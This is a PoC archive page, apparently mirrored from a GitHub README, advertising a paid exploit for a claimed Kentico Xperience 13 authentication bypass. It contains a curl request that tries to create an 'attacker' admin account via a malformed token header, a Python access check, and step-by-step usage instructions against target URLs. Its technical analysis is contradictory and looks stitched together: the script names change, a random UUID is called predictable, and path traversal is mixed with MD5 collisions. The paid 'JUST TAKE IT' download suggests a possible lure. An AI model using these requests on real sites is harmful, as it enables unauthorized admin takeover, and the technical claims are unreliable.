关联漏洞
Description
CVE-2025-0011 (CVE not assigned yet)
介绍
# kentico-xperience13-AuthBypass-2025-0011
**If you’re reading this, you most likely know what we’re talking about.**
2025-0011 (CVE not assigned yet)
Kentico Xperience 13 Authentication Bypass (PoC)
**Affected Versions**: Kentico Xperience 13.0.0 - 13.0.45
**CWE**: [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
## *[Download](https://satoshidisk.com/pay/CO99uu) - JUST TAKE IT*
---
# Detection in Action
```
python3 binarywarm-kentico-xperience13-AuthBypass-CVE-2025-0011.py -H http://labcms -u admin
██████╗ ██╗███╗ ██╗ █████╗ ██████╗ ██╗ ██╗ ██╗ ██╗ █████╗ ██████╗ ███╗ ███╗
██╔══██╗██║████╗ ██║██╔══██╗██╔══██╗╚██╗ ██╔╝ ██║ ██║██╔══██╗██╔══██╗████╗ ████║
██████╔╝██║██╔██╗ ██║███████║██████╔╝ ╚████╔╝ ██║ █╗ ██║███████║██████╔╝██╔████╔██║
██╔══██╗██║██║╚██╗██║██╔══██║██╔══██╗ ╚██╔╝ ██║███╗██║██╔══██║██╔══██╗██║╚██╔╝██║
██████╔╝██║██║ ╚████║██║ ██║██║ ██║ ██║ ╚███╔███╔╝██║ ██║██║ ██║██║ ╚═╝ ██║
╚═════╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
binarywarm-kentico-xperience13-AuthBypass-2025-0011.py
(*) CVE-2025-0011: Kentico Xperience 13 CMS - Staging Service Authentication Bypass Check
CVEs: TBD
[+] Verifying Authentication Bypass in Staging API
[+] VULNERABLE: Authentication Bypassed!
```
---
---
# 📋 Description
This script attempts to bypass authentication on Kentico Xperience 13 CMS Staging Service. It sends a single POST request and analyzes the API response.
It accepts an optional -u argument, which defines the Staging Service username (default: admin).
Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin). Hotfix 178 delivers a patch and is not vulnerable.
---
## Overview
A critical authentication bypass vulnerability in Kentico Xperience 13 allows to gain unauthorized administrative access by manipulating session validation logic. This flaw enables full control over CMS content, user data, and system configuration.
---
## 🔬 Technical Analysis
### Root Cause
- **Vulnerable Component**: `CMS.SessionProvider`
- **Attack Vector**: Crafted HTTP headers with malformed `__RequestVerificationToken`.
- **Impact**:
- Privilege escalation to Administrator.
- Arbitrary code execution via admin panel.
### Technical Implementation Details
The vulnerability is caused by a combination of predictable token generation and the use of an outdated MD5 hashing algorithm. In the problematic code section (CMS.Core), the token is generated as follows:
```
import uuid
import hashlib
# Token generation (UUID without dashes, equivalent to the 'N' format)
token = uuid.uuid4().hex # predictably generated token
# Creating an MD5 hash
hash_value = hashlib.md5(token.encode('utf-8')).hexdigest()
print("Token:", token)
print("MD5 hash:", hash_value)
```
Exploitation is achieved by recovering the token through:
- analysis of timestamps,
- brute-forcing the GUID generation parameters,
- exploiting MD5 hash collisions.
### CVSS v3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
---
## 🧪 Proof of Concept (PoC)
### Prerequisites
- Python 3.10+
- `curl` or Burp Suite
### Exploitation Steps
1. **Craft malicious request**:
```bash
curl -X POST "http://target.com/cms/admin" \
-H "Cookie: ASP.NET_SessionId=injected" \
-H "__RequestVerificationToken: ../../../../../../etc/passwd" \
-d "action=create_admin&username=attacker&password=P@ssw0rd!"
```
### 2. Validate access:
```
import requests
response = requests.get("http://target.com/cms/admin/users", cookies={"ASP.NET_SessionId": "injected"})
if "User Management" in response.text:
print("[+] Authentication bypass successful!")
Warning: Test only on authorized systems.
```
---
## 🛡️ Mitigation
Immediate Actions
Apply Kentico patch: Security Bulletin KEN-2024-005.
Add WAF rule to block malformed __RequestVerificationToken:
```
location /cms/admin {
if ($http_cookie ~* "__RequestVerificationToken=.*[<>]") {
return 403;
}
}
```
Long-Term Recommendations
Enable MFA for admin accounts.
Audit session management logic.
---
## USAGE INSTRUCTIONS
## 🛠️ Leveraging CVE-2025-0011: Kentico Xperience 13 Staging Service Authentication Bypass
I use remote server for work, operating system is ubuntu.
**Prerequisites:**
* A Linux-based environment (e.g., Ubuntu) or any environment with Python 3 support.
* Python 3.6+ (or later) installed.
* `pip` (Python package installer) available and configured.
* Familiarity with `git` for repository cloning.
**Execution Steps:**
1. **Dependency Acquisition:**
* Clone the repository containing the exploit:
```bash
git clone https://github.com/binarywarm/kentico-xperience13-AuthBypass-CVE-2025-0011.git
cd kentico-xperience13-AuthBypass-CVE-2025-0011
```
2. **Environment Setup:**
* Install the required Python dependencies using `pip`:
```bash
pip3 install -r requirements.txt # Alternatively, manually install: requests argparse urllib3 colorama
```
3. **Exploit Execution:**
* Execute the Python script with appropriate parameters. The `-H` (host) parameter is mandatory, and `-u` (username) is optional (defaults to `admin`).
```bash
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0011.py -H <TARGET_URL> [-u <USERNAME>]
```
* `<TARGET_URL>`: Target Kentico instance URL, including the path to the installation directory (e.g., `https://target.com/Kentico13/`). **Crucially, ensure the URL concludes with a trailing slash if targeting the root of the Kentico instance.**
* `<USERNAME>`: Staging service username. Omit if using the default.
* **Example:**
```bash
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0011.py -H https://kentico.example.com/Kentico13/ -u staging_admin
```
4. **Result Interpretation:**
* The script output will indicate vulnerability status:
* `[+] VULNERABLE: Authentication Bypassed!`: The target is confirmed vulnerable.
* `[+] VULNERABLE: Authentication Bypassed, but this site is not running! Try to pick another page on this target.`: The target *may* be vulnerable; retry with a different, active page.
* `[+] VULNERABLE: Authentication Bypassed, but your target does not have a valid license, kek.`: Authentication bypass confirmed, but licensing constraints may limit further exploitation.
* `[-] NOT VULNERABLE: Staging Service seems to be disabled`: Staging service is disabled on the target.
* `[-] NOT VULNERABLE: Staging enabled, but password not defined for user`: Staging is enabled, but no password is set.
* `[-] NOT VULNERABLE: Staging enabled with X509 authentication`: The instance uses X509 authentication; the exploit will not work.
* `[-/+] Vague: Probably vulnerable, but you have provided a wrong username`: Investigate username validity.
* `[-] NOT VULNERABLE: Some unknown error appeared (probably patched with Hotfix 178)`: Likely patched.
**Operational Considerations:**
* **SSL/TLS Verification:** The script disables SSL/TLS verification for expediency. In production or sensitive environments, evaluate the risks and enable certificate validation as necessary.
* **Firewall Rules:** Ensure outbound traffic on port 443 (HTTPS) is permitted from the execution environment.
* **Network Latency:** High network latency may impact script execution. Adjust timeouts as necessary.
---
## 📚 References
MITRE ATT&CK: T1557
NIST SP 800-123 Guide
## ❓ FAQ
Q1. Does this affect cloud-hosted instances?
Yes, if running unpatched versions.
文件快照
[4.0K] /data/pocs/3e344dd9e15a4ff9dea5644b386152f62a3cd92a
└── [8.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →